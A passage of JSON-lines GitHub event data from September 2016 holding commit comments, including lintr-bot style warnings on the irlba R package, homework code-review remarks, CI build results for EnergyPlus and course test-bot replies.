‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:260:15:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L260) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:292:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L292) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:293:30:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L293) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:327:9:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L327) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:393:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L393) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:394:23:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L394) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:416:26:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L416) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:448:40:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L448) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:454:17:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L454) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:457:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:463:32:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L463) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:464:30:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L464) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:484:12:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L484) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:487:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L487) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:492:16:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L492) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:493:29:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L493) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L523) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:530:48:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L530) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:531:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L531) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:536:40:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L536) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:537:38:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L537) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:557:12:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L557) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:620:5:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L620) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:45:40Z"}
{"id":"4576915757","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061774,"position":126,"line":126,"path":"assignment6/js/index.js","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:45:49Z","updated_at":"2016-09-16T23:45:49Z","body":"Great to see you using a switch statement even though we didn't go over it in class!"}},"created_at":"2016-09-16T23:45:49Z"}
{"id":"4576916853","type":"CommitCommentEvent","actor":{"login":"rgetz"},"repo":{"name":"analogdevicesinc/libiio"},"payload":{"comment":{"id":19061777,"position":null,"line":null,"path":null,"commit_id":"463edc7c28c41d85df55cc8299c9fb0f220b2171","created_at":"2016-09-16T23:46:17Z","updated_at":"2016-09-16T23:46:17Z","body":"Yeah, Paul was excited all day talking about what was going to be number 1000. \r\n\r\n:)"}},"created_at":"2016-09-16T23:46:17Z"}
{"id":"4576919048","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061783,"position":207,"line":207,"path":"assignment6/js/index.js","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:47:16Z","updated_at":"2016-09-16T23:47:16Z","body":"great work!"}},"created_at":"2016-09-16T23:47:16Z"}
{"id":"4576921441","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061784,"position":6,"line":6,"path":"GoIT_Project_1/src/module_5_homework/DAOImpl.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T23:48:20Z","updated_at":"2016-09-16T23:48:20Z","body":"Вообще ДАО используют в связке с базой данных. И тут прописывают методы работы с этой базой Пример 9.4 http://javatutor.net/articles/j2ee-pattern-data-access-object"}},"created_at":"2016-09-16T23:48:20Z"}
{"id":"4576922252","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061789,"position":22,"line":22,"path":"assignment6/js/index.js","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:48:41Z","updated_at":"2016-09-16T23:48:41Z","body":"My only real feedback on the JS would be encourage you to think about how you could refactor this based off of our conversation on Wed..I think it'd be beneficial for you to write out the pseudocode and sketch a plan, even if you don't implement it.  Not to overload your plate, but if you wanted to continue on this site/project, those would be good next steps.  "}},"created_at":"2016-09-16T23:48:41Z"}
{"id":"4576929665","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061810,"position":27,"line":27,"path":"GoIT_Project_1/src/module_5_homework/DAOImpl.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T23:51:53Z","updated_at":"2016-09-16T23:51:53Z","body":"roomId как бы говорит нам, что мы ищем комнату с таким id\r\n У тебя метод возвращает то, что ты только что создал  id, 0, 0, null, null, null\r\n"}},"created_at":"2016-09-16T23:51:53Z"}
{"id":"4576929865","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.com"},"payload":{"comment":{"id":19061811,"position":9,"line":57,"path":"assets/css/_media-queries.scss","commit_id":"df43ea2201553915e9c2a8206103143385f5d5e5","created_at":"2016-09-16T23:51:58Z","updated_at":"2016-09-16T23:51:58Z","body":"I went with a hard `16px` there because the rem math started to get into a funk floating point."}},"created_at":"2016-09-16T23:51:58Z"}
{"id":"4576930395","type":"CommitCommentEvent","actor":{"login":"lambdalisue"},"repo":{"name":"lambdalisue/vim-gita"},"payload":{"comment":{"id":19061813,"position":11,"line":85,"path":"autoload/gita/content/blame_view.vim","commit_id":"9e6b916028762dec9bab4b9f836b3bb561d0d7c5","created_at":"2016-09-16T23:52:12Z","updated_at":"2016-09-16T23:52:12Z","body":"Yes. Thanks! https://github.com/lambdalisue/vim-gita/issues/135"}},"created_at":"2016-09-16T23:52:12Z"}
{"id":"4576937933","type":"CommitCommentEvent","actor":{"login":"dpc"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19061834,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-16T23:55:38Z","updated_at":"2016-09-16T23:55:38Z","body":"Better to impl this: https://doc.rust-lang.org/std/error/trait.Error.html\r\n"}},"created_at":"2016-09-16T23:55:38Z"}
{"id":"4576938104","type":"CommitCommentEvent","actor":{"login":"douglascrockford"},"repo":{"name":"douglascrockford/JSLint"},"payload":{"comment":{"id":19061835,"position":null,"line":null,"path":null,"commit_id":"185661488c2d805eddd99685fa39f8291e6a1187","created_at":"2016-09-16T23:55:41Z","updated_at":"2016-09-16T23:55:41Z","body":"fart is short for fat arrow."}},"created_at":"2016-09-16T23:55:41Z"}
{"id":"4576938279","type":"CommitCommentEvent","actor":{"login":"wkeese"},"repo":{"name":"brunano21/deliteful"},"payload":{"comment":{"id":19061836,"position":53,"line":78,"path":"samples/Combobox.html","commit_id":"43b46217f1a746e36edc61c5d1f4c270f03b112b","created_at":"2016-09-16T23:55:46Z","updated_at":"2016-09-16T23:55:46Z","body":"Are you sure you need a special method to interface with dstore/Request instead of dstore/Memory?   Last time I checked, you could pass a RegExp object into dstore/Request, and it would still work because it would call .toString() on that object, converting it into a string.\r\n\r\nIf it turns out that you do need customized methods depending on the store, then we should have a dedicated method just to compute the filter (i.e. just to set list.query), without the other calls like `openDropDown()` and `closeDropDown()`."}},"created_at":"2016-09-16T23:55:46Z"}
{"id":"4576940668","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061840,"position":null,"line":null,"path":null,"commit_id":"b78c9d722c1bd1282568e8011ef35f73ae8d4361","created_at":"2016-09-16T23:56:47Z","updated_at":"2016-09-16T23:56:47Z","body":"[R/irlba.R:326:9:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/R/irlba.R#L326) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:619:5:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/R/irlba.R#L619) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:56:47Z"}
{"id":"4576940957","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061842,"position":null,"line":null,"path":null,"commit_id":"b78c9d722c1bd1282568e8011ef35f73ae8d4361","created_at":"2016-09-16T23:56:54Z","updated_at":"2016-09-16T23:56:54Z","body":"[R/irlba.R:326:9:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/R/irlba.R#L326) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:619:5:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/R/irlba.R#L619) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:56:54Z"}
{"id":"4576941128","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061843,"position":null,"line":null,"path":null,"commit_id":"b78c9d722c1bd1282568e8011ef35f73ae8d4361","created_at":"2016-09-16T23:56:59Z","updated_at":"2016-09-16T23:56:59Z","body":"[R/irlba.R:326:9:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/R/irlba.R#L326) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:619:5:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/R/irlba.R#L619) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/b78c9d722c1bd1282568e8011ef35f73ae8d4361/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:56:59Z"}
{"id":"4576941637","type":"CommitCommentEvent","actor":{"login":"iotsupport"},"repo":{"name":"mzp/LoveLiver"},"payload":{"comment":{"id":19061847,"position":null,"line":null,"path":null,"commit_id":"40737918c0ed0e8f9318800f212399c06e3e14b4","created_at":"2016-09-16T23:57:12Z","updated_at":"2016-09-16T23:57:12Z","body":"First and foremost, I have to congratulate for your vision. For all iPhone 6 users (and so on) it is a problem now to manipulate Live Photos.\r\n\r\nI am calling for help. I am trying to run this CLI in El Capitan and I cannot find the binary to put in /usr/local/bin. Of course, when I put the whole directory, an error occurs. I used the binary included in the LiveLover.app, but frameworks are missing and stops again.\r\n\r\nIs there a way to grab this binary somewhere?\r\n\r\n**This is the only and more simple tool we have found in the whole Internet to merge a JPEG and a MOV as a Live Photo**. I simply cannot understand how is it possible that Adobe doesn't implement a feature like yours bundled in their apps (Lightroom, etc)."}},"created_at":"2016-09-16T23:57:12Z"}
{"id":"4571942418","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19047939,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T03:00:17Z","updated_at":"2016-09-16T03:00:17Z","body":"FixTransitionRules (Myoldmopar) - i386-Windows-7-VisualStudio-12: OK (2333 of 2336 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T03:00:17Z"}
{"id":"4571946142","type":"CommitCommentEvent","actor":{"login":"malin1993ml"},"repo":{"name":"cmu-db/peloton"},"payload":{"comment":{"id":19047948,"position":7,"line":7,"path":"script/coding_style.md","commit_id":"fef470f55853e0a743f5cb39de82418b049b24fe","created_at":"2016-09-16T03:01:53Z","updated_at":"2016-09-16T03:01:53Z","body":"I see. But it seems that all our code are using 2-column indentation right now. That's also what's used in google coding style:\r\nhttps://google.github.io/styleguide/cppguide.html\r\n\r\nIt might be better to change the clang-format file?"}},"created_at":"2016-09-16T03:01:53Z"}
{"id":"4571948232","type":"CommitCommentEvent","actor":{"login":"enriquearce00"},"repo":{"name":"cuongnv764119/tortoisesvn"},"payload":{"comment":{"id":19047951,"position":null,"line":null,"path":null,"commit_id":"db7ddeeb3fe250c73ac7aa481a2224fe89a11325","created_at":"2016-09-16T03:02:53Z","updated_at":"2016-09-16T03:02:53Z","body":"Failed to compile \"TortoiseProc\".\r\n\r\nMissing library \"libsvn_tsvn32.lib\".\r\n\r\nWhere I can get the library mentioned above?\r\n\r\nThank you."}},"created_at":"2016-09-16T03:02:53Z"}
{"id":"4571949550","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19047954,"position":null,"line":null,"path":null,"commit_id":"dd0148bbdb6bf1597575b6d5d484f715549f5d61","created_at":"2016-09-16T03:03:28Z","updated_at":"2016-09-16T03:03:28Z","body":"Related to: backdrop/backdrop-issues#2174 "}},"created_at":"2016-09-16T03:03:28Z"}
{"id":"4571953583","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047964,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:05:19Z","updated_at":"2016-09-16T03:05:19Z","body":"@CPSC310Bot "}},"created_at":"2016-09-16T03:05:19Z"}
{"id":"4571953636","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047965,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:05:20Z","updated_at":"2016-09-16T03:05:20Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-16T03:05:20Z"}
{"id":"4571954848","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047967,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:05:53Z","updated_at":"2016-09-16T03:05:53Z","body":"@CPSC310Bot "}},"created_at":"2016-09-16T03:05:53Z"}
{"id":"4571955248","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047969,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:06:03Z","updated_at":"2016-09-16T03:06:03Z","body":"5 passing, 4 failing\nName of first spec to fail: /echo/:id/  Should be able to properly echo a valid message "}},"created_at":"2016-09-16T03:06:03Z"}
{"id":"4571955531","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047972,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:06:10Z","updated_at":"2016-09-16T03:06:10Z","body":"@CPSC310Bot "}},"created_at":"2016-09-16T03:06:10Z"}
{"id":"4571955551","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047973,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:06:11Z","updated_at":"2016-09-16T03:06:11Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-16T03:06:11Z"}
{"id":"4571957009","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19047975,"position":null,"line":null,"path":null,"commit_id":"8d7c336590837f0d995b1105a16de81f076ed537","created_at":"2016-09-16T03:06:53Z","updated_at":"2016-09-16T03:06:53Z","body":"5 passing, 4 failing\nName of first spec to fail: /echo/:id/  Should be able to properly echo a valid message "}},"created_at":"2016-09-16T03:06:53Z"}
{"id":"4571964766","type":"CommitCommentEvent","actor":{"login":"jcbeaudoin"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19047989,"position":null,"line":null,"path":null,"commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-16T03:10:12Z","updated_at":"2016-09-16T03:10:12Z","body":"The bootstrap issue you found should now be fixed by [commit 0f88925](https://github.com/jcbeaudoin/MKCL/commit/0f8892523553338f743cb02f3bf3dac798f18e18).\r\n"}},"created_at":"2016-09-16T03:10:12Z"}
{"id":"4571968855","type":"CommitCommentEvent","actor":{"login":"tucano3000"},"repo":{"name":"wgenial/sinesp-consulta-placa"},"payload":{"comment":{"id":19047997,"position":7,"line":6,"path":"README.md","commit_id":"db1beee20e54d3080902aa4e7d3b08a676adeaa8","created_at":"2016-09-16T03:12:00Z","updated_at":"2016-09-16T03:12:00Z","body":"Parou de funcionar ?"}},"created_at":"2016-09-16T03:12:00Z"}
{"id":"4571972089","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048005,"position":null,"line":null,"path":null,"commit_id":"3901b072d07804c76f2947da1c08b20439b79ac1","created_at":"2016-09-16T03:13:36Z","updated_at":"2016-09-16T03:13:36Z","body":"FixTransitionRules (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3901b072d07804c76f2947da1c08b20439b79ac1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-16T03:13:36Z"}
{"id":"4571979681","type":"CommitCommentEvent","actor":{"login":"alanmoo"},"repo":{"name":"mozilla/science.mozilla.org"},"payload":{"comment":{"id":19048018,"position":null,"line":null,"path":null,"commit_id":"fcdfd7a67b1f50e59c312ce2e14d8042ac4bad79","created_at":"2016-09-16T03:17:22Z","updated_at":"2016-09-16T03:17:22Z","body":"Go ahead and merge this into master, and then it goes onto staging. Then we use Heroku to migrate it to production. "}},"created_at":"2016-09-16T03:17:22Z"}
{"id":"4571985998","type":"CommitCommentEvent","actor":{"login":"aethelwulffe"},"repo":{"name":"openemr/openemr"},"payload":{"comment":{"id":19048041,"position":null,"line":null,"path":null,"commit_id":"00ca05981d066657c47feef302b1fc91026144bb","created_at":"2016-09-16T03:20:30Z","updated_at":"2016-09-16T03:20:30Z","body":"You're welcome to this and more.  A little attribution of some kind \nwould be more welcome.\n\n\nOn 2016-09-15 10:34 PM, Brady Miller wrote:\n>\n> Thank you.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/openemr/openemr/commit/00ca05981d066657c47feef302b1fc91026144bb#commitcomment-19047776>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAhzF7Hw6phQ5lxpcpaFE7MbTBzI41Msks5qqgAvgaJpZM4J-iJR>.\n>\n\n"}},"created_at":"2016-09-16T03:20:30Z"}
{"id":"4571986979","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19048045,"position":47,"line":166,"path":"src/full/Agda/Compiler/MAlonzo/Primitives.hs","commit_id":"4ac6175a6983e310476ea80308a047df81b3b6b5","created_at":"2016-09-16T03:21:01Z","updated_at":"2016-09-16T03:21:01Z","body":"Right. I added the documentation in 82e329f."}},"created_at":"2016-09-16T03:21:01Z"}
{"id":"4571987879","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19048046,"position":null,"line":null,"path":null,"commit_id":"a50eadb1622126cc689ee89ca76b3270e3d16f95","created_at":"2016-09-16T03:21:28Z","updated_at":"2016-09-16T03:21:28Z","body":"makingPrettyTransition (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1190 of 1190 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a50eadb1622126cc689ee89ca76b3270e3d16f95-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-16T03:21:28Z"}
